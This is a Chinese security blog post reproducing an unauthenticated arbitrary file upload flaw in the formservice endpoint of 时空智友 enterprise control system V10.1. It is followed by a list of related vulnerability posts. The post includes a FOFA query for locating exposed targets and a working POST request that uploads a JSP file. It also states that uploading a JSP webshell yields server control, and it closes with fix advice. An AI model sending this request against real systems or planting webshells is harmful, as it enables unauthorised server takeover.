时空智友企业管控系统文件上传漏洞复现

最新推荐文章于 2024-10-29 17:43:34 发布
最新推荐文章于 2024-10-29 17:43:34 发布
阅读量791 收藏 1
点赞数 1
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43981050/article/details/132984582
版权

前言

此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!

一、产品简介

时空智友企业流程化管控系统是一款企业信息管理软件,致力于协助大健康企业构建内部信息化,解决GSP管理、多组织管理、财务管理、税控管理、线上线下一体化等问题。 该系统可以帮助企业实现流程化管控,提高工作效率和管理水平。

二、漏洞描述

时空智友企业流程化管控系统 formservice接口处存在任意文件上传漏洞,未经认证的攻击者可通过此接口上传后门文件,最终可导致服务器失陷。

三、影响范围

时空智友 V10.1

四、复现环境

FOFA:app=“时空智友V10.1”

五、漏洞复现

1.访问存在漏洞的网站,抓包
在这里插入图片描述

2.POC

POST /formservice?service=attachment.write&isattach=false&filename=c.jsp HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 3

ccc

3.访问http://your-ip/form/temp/回显的文件名,成功
在这里插入图片描述

在这里插入图片描述

六、漏洞利用

直接上传jsp马,即可获得服务器权限,这里不再演示

七、修复建议

限制外网访问此系统,更新系统至安全版本

参考链接

https://blog.csdn.net/qq_41904294/article/details/132419148

明丨通
关注
时空企业流程化管控系统文件上传漏洞
holyxp的博客
08-23 844
时空企业流程化管控系统是一个功能丰富、灵活可定制的企业管理工具。通过该系统,企业能够实现流程的自动化、协同的提升、数据的洞察和决策的优化,从而提高工作效率、管理水平和企业竞争力。时空企业流程化管控系统 formservice接口处存在任意文件上传漏洞,未经认证的攻击者可通过此接口上传后门文件,最终可导致服务器失陷。
时空企业流程化管控系统文件上传漏洞复现
0xSec
08-22 3172
时空企业流程化管控系统 formservice接口处存在任意文件上传漏洞,未经认证的攻击者可通过此接口上传后门文件,最终可导致服务器失陷。
漏洞复现时空企业流程化管控系统文件上传漏洞(可getshell)
fangyingquano的专栏
08-19 375
北京时空企业流程化管控系统是一款功能强大、灵活可定制的企业管理工具,旨在帮助企业实现流程的规范化、自动化和优化,提高工作效率、降低成本并提升管理水平。时空企业流程化管控系统formservice接口存在任意文件上传漏洞,攻击者可利用此漏洞上传后门文件,进而可能导致服务器被攻陷。POC验证,可直接上传jsp马进行getshell,获到服务器权限。限制外网访问和将系统升级至安全版本。四、漏洞验证(含POC)
漏洞复现时空ERP——uploadStudioFile——任意文件上传
LongL_GuYu的博客
07-10 1331
时空ERP是专为医药等行业设计的综合性企业资源规划系统,融合云计算和移动技术,支持多组织管理。。其uploadStudioFile接口存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件到服务器上,包括木马后门文件,导从而获取服务器权限。
(新接口)时空 ERP upload 文件上传漏洞
weixin_43167326的博客
06-26 357
时空ERP是一款基于云计算和大数据技术的企业资源计划管理系统。该系统旨在帮助企业实现数字化转型,提高运营效率、降低成本、增强决策能力和竞争力,时空ERP系统涵盖了企业的各个业务领域,包括财务管理、供应链管理、生产计划、库存管理、人力资源管理、客户关系管理等。该系统具有强大的数据分析和报表功能,能够为企业提供实时的数据洞察和业务能,帮助企业更好地应对市场变化和竞争压力。
时空ERP uploadStudioFile 任意文件上传漏洞复现
最新发布
iSee857的博客
10-29 455
该系统涵盖了企业的各个业务领域,包括财务管理、供应链管理、生产计划、库存管理、人力资源管理、客户关系管理等,并具有强大的数据分析和报表功能,能够为企业提供实时的数据洞察和业务能,帮助企业更好地应对市场变化和竞争压力‌。首先确保系统限制了文件所必须的上传后缀,然后确保文件名不包含任何可能被解释为目录或遍历序列 ( ../) 的子字符串,同时做到重命名上传的文件以避免可能导致现有文件被覆盖的冲突并且上传文件的存储目录禁用执行权限。
时空企业流程化管控系统任意文件上传漏洞复现【附POC】
薛定谔嘚喵博客
09-25 530
时空企业流程化管控系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化,从而提高工作效率、降低成本并提升管理水平。时空企业流程化管控系统存在任意文件上传漏洞
漏洞复现时空企业流程化管控系统uploadStudioFile接口存在任意文件上传漏洞
失心少年
10-24 324
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。时空企业流程化管控系统存在任意文件上传漏洞时空企业流程化管控系统uploadStudioFile接口存在任意文件上传漏洞漏洞链接:http://xx.xx.xx.xx/formservice?上传后的路径 http://xx.xx.xx.xx/update/temp/studio/677433.jsp。
浙大恩特客户资源管理系统任意文件上传漏洞复现
0xSec
11-10 1823
浙大恩特客户资源管理系统中fileupload.jsp、CustomerAction.entphone、MailAction.entphone、machord_doc.jsp等接口处存在文件上传漏洞,未经身份认证的攻击者可以上传任意后门文件,最终可导致服务器失陷。
时空企业信息管理系统任意文件读取漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-07 807
时空企业信息管理系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化,从而提高工作效率、降低成本并提升管理水平。时空企业信息管理系统存在任意文件读取漏洞,攻击者可以在未授权的情况下读取系统上的文件。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
海康威视iVMS综合安防系统文件上传漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-02 619
海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控、联网报警、能分析、运维管理等多种安全防范应用系统,构建的多业务应用综合管理平台。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
华天OA任意文件上传漏洞 复现
薛定谔嘚喵博客
10-09 800
华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合,为用户提供了低成本、高效能的协同办公和管理平台。睿的管理者通过使用华天动力协同办公平台,在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。该OA系统存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器的敏感信息。
时空企业流程化管控系统任意文件读取漏洞(含批量验证poc)
weixin_43567873的博客
04-17 221
时空企业流程化管控系统任意文件读取漏洞(含批量验证poc)
时空企业信息管理系统 SQL注入漏洞复现
09-19 1668
时空企业流程化管控系统是一款企业信息管理软件,致力于协助大健康企业构建内部信息化,解决GSP管理、多组织管理、财务管理、税控管理、线上线下一体化等问题。该系统可以帮助企业实现流程化管控,提高工作效率和管理水平。
亿某通电子文档安全管理系统任意文件上传漏洞 CNVD-2023-59471
afei001
09-20 1197
亿某通电子文档安全管理系统是一款电子文档安全防护软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产。亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口处存在任意文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。
漏洞复现时空ERP系统uploadStudioFile任意文件上传漏洞
m0_46381222的博客
10-29 896
漏洞复现时空ERP系统uploadStudioFile任意文件上传漏洞
漏洞复现】蓝凌EIS慧协同平台saveImg接口存在任意文件上传
失心少年
10-23 478
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!蓝凌慧协同平台满足组织企业在知识、协同及项目管理系统中建设等需求。该平台在saveImg接口处存在任意文件上传,攻击者可通过该漏洞上传Weshell控制服务器。1.利用如下POC进行POST请求上传文件。
漏洞复现--云时空商业ERP文件上传
qq_53003652的博客
12-06 692
时空商业ERP以大型集团供应链系统为支撑,是基于互联网技术的多渠道模式营销服务管理体系,可以帮助您整合线上和线下交易模式,覆盖企业经营管理应用各个方面。该产品存在任意文件上传漏洞,攻击者可通过此漏洞获取服务器权限。访问/uploads/pics/【返回的日期】/【上传文件名称】联系厂家获取漏洞修复补丁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值